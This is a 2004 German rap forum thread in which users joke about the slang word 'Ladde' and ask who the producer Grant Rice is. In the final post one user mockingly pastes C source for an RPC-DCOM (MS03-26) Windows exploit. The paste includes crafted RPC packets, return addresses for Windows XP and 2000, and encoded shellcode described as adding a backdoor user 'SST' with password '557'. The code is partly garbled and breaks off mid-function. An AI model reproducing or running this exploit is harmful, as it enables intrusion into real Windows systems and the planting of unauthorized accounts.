UG Rap Community

Aktuelle Zeit: 15.05.2024, 18:43

Alle Zeiten sind UTC + 1 Stunde




Ein neues Thema erstellen Auf das Thema antworten  [ 110 Beiträge ]  Gehe zu Seite Vorherige  1 ... 4, 5, 6, 7, 8  Nächste
Autor Nachricht
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 16:41 
Offline
Benutzeravatar

Registriert: 16.02.2004, 16:30
Beiträge: 2222
Wohnort: Weinheim
Face97 hat geschrieben:
South G hat geschrieben:
Also einer der Coolsten Namen ist Tech9ne find ich :thumbs:



CHA..also Grant Rice Mixtape bestellen....

CHA ist mit dabei CHA

http://www.ugrap.de/forum/viewtopic.php?t=1140

CHA


Ich weiß nicht mal wer oder was Grant Rice ist... :sad: :confused: :rolleyes:


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 16:45 
Offline

Registriert: 11.12.2003, 23:01
Beiträge: 2731
South G hat geschrieben:
Ich weiß nicht mal wer oder was Grant Rice ist... :sad: :confused: :rolleyes:

Das is Ladde, bestell einfach mit in Warloccs Grant Rice bestellthread :thumbs: wirst bestimmt nicht enttäuscht sein

http://www.ugrap.de/forum/viewtopic.php?t=1140


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 16:47 
Offline
Benutzeravatar

Registriert: 16.02.2004, 16:30
Beiträge: 2222
Wohnort: Weinheim
breach hat geschrieben:
South G hat geschrieben:
Ich weiß nicht mal wer oder was Grant Rice ist... :sad: :confused: :rolleyes:

Das is Ladde, bestell einfach mit in Warloccs Grant Rice bestellthread :thumbs: wirst bestimmt nicht enttäuscht sein

http://www.ugrap.de/forum/viewtopic.php?t=1140


Was zum Teufel ist Ladde, n Artist? Und wer oder was ist jetzt Grant Rice? Gibts irgendwas zum reinhörn oder ist das was anderes? :confused:


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 16:51 
Offline
Benutzeravatar

Registriert: 11.12.2003, 18:28
Beiträge: 3696
Ladde auch Lax heisst Latte und bedeutet soviel wie EGAL :ugly:


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 16:51 
Offline
Globaler Moderator
Benutzeravatar

Registriert: 09.03.2004, 22:26
Beiträge: 23755
Wohnort: Bad Iburg
South G hat geschrieben:
breach hat geschrieben:
South G hat geschrieben:
Ich weiß nicht mal wer oder was Grant Rice ist... :sad: :confused: :rolleyes:

Das is Ladde, bestell einfach mit in Warloccs Grant Rice bestellthread :thumbs: wirst bestimmt nicht enttäuscht sein

http://www.ugrap.de/forum/viewtopic.php?t=1140


Was zum Teufel ist Ladde, n Artist? Und wer oder was ist jetzt Grant Rice? Gibts irgendwas zum reinhörn oder ist das was anderes? :confused:


:funny: ;)


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 16:57 
Offline
Benutzeravatar

Registriert: 16.02.2004, 16:30
Beiträge: 2222
Wohnort: Weinheim
Knowbody hat geschrieben:
South G hat geschrieben:
breach hat geschrieben:
South G hat geschrieben:
Ich weiß nicht mal wer oder was Grant Rice ist... :sad: :confused: :rolleyes:

Das is Ladde, bestell einfach mit in Warloccs Grant Rice bestellthread :thumbs: wirst bestimmt nicht enttäuscht sein

http://www.ugrap.de/forum/viewtopic.php?t=1140


Was zum Teufel ist Ladde, n Artist? Und wer oder was ist jetzt Grant Rice? Gibts irgendwas zum reinhörn oder ist das was anderes? :confused:


:funny: ;)


looooooooooooooooooooooool sorry ich kenn mich mit eurem komisch dialekt nicht aus ;) :) , ok dann............was weiß ich :thankyou:


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 17:04 
Offline
Benutzeravatar

Registriert: 06.12.2003, 11:56
Beiträge: 5023
Hä? Also ich wohn auch in Weinheim und der begriff Latte is hier durchaus geläufig. ;)


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 17:07 
Offline
Benutzeravatar

Registriert: 06.12.2003, 12:46
Beiträge: 6451
Wohnort: Stuttgart
Grant Rice ist producer, für leute wie Tech N9ne zB

_________________
Bild
wicketshit.com


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 17:09 
Offline
Benutzeravatar

Registriert: 16.02.2004, 16:30
Beiträge: 2222
Wohnort: Weinheim
Warlocc hat geschrieben:
Grant Rice ist producer, für leute wie Tech N9ne zB


Warum nicht gleich so...... :)

Tekz hat geschrieben:
Hä? Also ich wohn auch in Weinheim und der begriff Latte is hier durchaus geläufig.


Also wenn ich Ladde höre dann denk ich eher an etwas anderes......(lol)
;)
:)


Zuletzt geändert von Arkane am 07.05.2004, 17:20, insgesamt 2-mal geändert.

Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 17:11 
Offline
Benutzeravatar

Registriert: 03.03.2004, 14:55
Beiträge: 5969
Wohnort: Midgard
South G hat geschrieben:
Was zum Teufel ist Ladde, n Artist?


:lol: das ist das Posting des Monats lool

_________________
Bild


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 17:22 
Offline
Benutzeravatar

Registriert: 16.02.2004, 16:30
Beiträge: 2222
Wohnort: Weinheim
Noodlez hat geschrieben:
South G hat geschrieben:
Was zum Teufel ist Ladde, n Artist?


:lol: das ist das Posting des Monats lool


(sorry) 1-3_c-K *m>E_i=N€N §a_R-c||H


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 17:56 
Offline
Benutzeravatar

Registriert: 03.03.2004, 14:55
Beiträge: 5969
Wohnort: Midgard
:uglywonder:

_________________
Bild


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 18:00 
Offline
Benutzeravatar

Registriert: 16.02.2004, 16:30
Beiträge: 2222
Wohnort: Weinheim
Noodlez hat geschrieben:
:uglywonder:


Kombiniere: Du magst smilies die so ähnlich wie das aussehn:

:ugly:

woher soll ich wissen was Ladde ist? Ich hab das noch nie gehört "lol".

Aber da du ja alles auf der Welt weißst kannst du mir auch bestimmt sagen was in diesem RPC2-DCOM Quelltext falsch ist:

#include
#include
#include
#include
#include
#include

FILE *fp1;
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};


unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask)
{
for(int i=offset;i<(offset+lenght);i++)
buf=buf^mask;
}
DWORD GETSTRCS(char *buf)
{
DWORD cs=0;
bool cld=false;
for(unsigned int i=0;i {
for(int z=0;z<13;z++)
{
if(cs&1) cld=true;
cs=cs>>1;
if(cld) cs=cs|0x80000000;
cld=false;
}
cs+=buf;
}
return cs;
}

struct {
DWORD seh;
DWORD jmp;
DWORD heap;
char target[200];
} target_os[]=
{
{
0x005Bfd2c,
0x00081eeb,
0x00180000,
"WinXP"
},
{
0x0095fd3c,
0x00081eeb,
0x00170000,
"Win2K"
}
},v;
unsigned char rawData1[]=
"\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
"\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"

"\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"

//SHELLCODE From SAM ,THANKs !
//Add user SST,password is 557,
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
"\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
"\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
"\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
"\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
"\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
"\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
"\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
"\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
"\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
"\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
"\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
"\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
"\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
"\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
"\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
"\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
"\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"

"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
"\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x77\xe0\x43\x00\x00\x10\x5c\x00"
"\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
"\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os


//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic
//"Utilization of released heap structure and exploit of universal Heap overflow in windows ".
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
"\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
"\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
"\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
"\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
"\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
"\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
"\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
"\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
"\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
"\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
"\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
"\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
"\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
"\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
"\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
"\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
"\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
"\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
"\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
"\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
"\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
"\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
"\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
"\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"

"\x04\x04\x00\x70\x00\x04\x40"
"\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"

"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";


int version(char ip[16], int sock)
{
//un poco de ettercap...


unsigned char peer0_0[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };


unsigned char peer0_1[] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };

/*

unsigned char win2kvuln[] = {
0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00};
*/
fd_set fds2;
unsigned char buf[1024];

int l;
struct timeval tv2;
FD_ZERO(&fds2);
FD_SET(sock, &fds2);
tv2.tv_sec = 6;
tv2.tv_usec = 0;

memset(buf,'\0',sizeof(buf));
send(sock,(char *)peer0_0,sizeof(peer0_0),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
l=recv (sock, (char *)buf, sizeof (buf),0);
// for(i=0;i<52;i++)
// {
// if (i==28) i=i+4;
// if (buf[i+32]!=win2kvuln)
// {
send(sock,(const char *)peer0_1,sizeof(peer0_1),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
memset(buf,'\0',sizeof(buf));
l=recv (sock, (char *)buf, sizeof (buf),0);
if (l==32)
{
closesocket(sock);
return(1);//winxp
}
else
{
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
return(0);//win2kby default. Nt4 not added..
}
}
else return(-1);
// }


//}
// closesocket(sock);
// return(0);//win2k
}
closesocket(sock);
return(-1); //Unknown
}
/********************************************************************************/
int attack(char *ip1,bool atack)
{
unsigned char rawData[1036];
memcpy(rawData,rawData1,1036);
unsigned char shellcode[50000];
char ip[200];
strcpy(ip,ip1);
